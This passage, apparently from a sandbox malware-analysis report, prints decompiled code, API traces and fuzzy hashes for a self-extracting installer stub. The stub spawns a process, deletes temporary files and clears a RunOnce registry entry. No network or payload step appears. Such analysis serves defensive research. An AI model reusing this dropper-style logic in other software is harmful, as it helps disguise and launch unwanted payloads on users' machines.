                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003258E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-2825630923
                                                                                                                                                                                                                                            • Opcode ID: 1d31b020fe35da563f3475847a4aa48bf7182233f0848a8be99c0931ab058344
                                                                                                                                                                                                                                            • Instruction ID: d3542174635e9e5e9fa16afd82722009ec10960680d147d4393d4dcfc11f4015
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d31b020fe35da563f3475847a4aa48bf7182233f0848a8be99c0931ab058344
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70112232600630ABC7325F7ABC0DB9B7E9EDF46770F104619F50AD7281CB70994686A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 323fef-324010 676 324016-32403b CreateProcessA 675->676 677 32410a-32411a call 326ce0 675->677 678 324041-32406e WaitForSingleObject GetExitCodeProcess 676->678 679 3240c4-324101 call 326285 GetLastError FormatMessageA call 3244b9 676->679 682 324070-324077 678->682 683 324091 call 32411b 678->683 694 324106 679->694 682->683 687 324079-32407b 682->687 688 324096-3240b8 CloseHandle * 2 683->688 687->683 690 32407d-324089 687->690 692 3240ba-3240c0 688->692 693 324108 688->693 690->683 691 32408b 690->691 691->683 692->693 695 3240c2 692->695 693->677 694->693 695->694
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00323FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00326CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E003244B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0x328a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0x329a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0x329a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E0032411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0x329a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 00324033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00324049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 0032405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0032409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003240A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003240DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003240E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 0d25bda8d7ea5ad0f720b0fe5be713140e66aa83483ef0f1011f33b33a9dc3bc
                                                                                                                                                                                                                                            • Instruction ID: 97b35076559baa8d20a73aac4c364641e78ba8cfbee92c65d7b461fe1c61b08b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d25bda8d7ea5ad0f720b0fe5be713140e66aa83483ef0f1011f33b33a9dc3bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3631D631640228ABEB339F65EC49FABB77CEB94710F10416DF905D5160C6305C92CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003251E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E0032468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E0032468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E003244B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0x329124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x329124 = E00326285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00322F4D,?,00000002,00000000), ref: 00325201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00325250
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: c991a7ea88f459146e97a3911308d0cce264d4c72f1040f79f2f65f358c105b6
                                                                                                                                                                                                                                            • Instruction ID: 3a6717abd1b605ec374a8ad29a8568ac8b68b4c319b38bc498cba395996433a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c991a7ea88f459146e97a3911308d0cce264d4c72f1040f79f2f65f358c105b6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8711B675601721EFD3276B727D46B3B719EEB89350F11482DFB46D91D0DA799C024124
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E003252B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0x3291e0; // 0x2b58e90
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0x328a24 == 0 &&  *0x329a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0x328a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0x328a24 == 0 &&  *0x329a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00321781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            					if(( *0x329a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E003265E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00322390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0x328a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0x329a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00321FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0x328a20 =  *0x328a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00326CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(02B58E90,00000080,?,00000000), ref: 003252F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(02B58E90), ref: 003252FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02B58E90,?,00000000), ref: 00325305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02B58E90), ref: 0032530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(003211FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00325363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00325334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-1116576409
                                                                                                                                                                                                                                            • Opcode ID: 59a35a1e31ab5148816670cb254bcdb93d5126a2844ba03895aa54ec808c6743
                                                                                                                                                                                                                                            • Instruction ID: 315dbd303349d3957e5fd7b61c84e005af0185d9b412aa0e5b7ce1d24324296f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59a35a1e31ab5148816670cb254bcdb93d5126a2844ba03895aa54ec808c6743
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5821F335901A24DFDB33DB10FD0AB6937B8BB14750F05511EEA82561A4CFB05E96CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00321FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0x328530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0032538C,?,?,0032538C), ref: 00322005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(0032538C,wextract_cleanup1,?,?,0032538C), ref: 00322017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(0032538C,?,?,0032538C), ref: 00322020
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00324CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0x3291d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00324E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00326CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0x3291e4;
                                                                                                                                                                                                                                            						_t58 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0x3291e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x3291e4;
                                                                                                                                                                                                                                            						_t30 = E00324702( &_v268, 0x3291e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E0032476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00324980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E003247E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x3293f4 =  *0x3293f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0x3291e4;
                                                                                                                                                                                                                                            						_t63 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0x3291e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
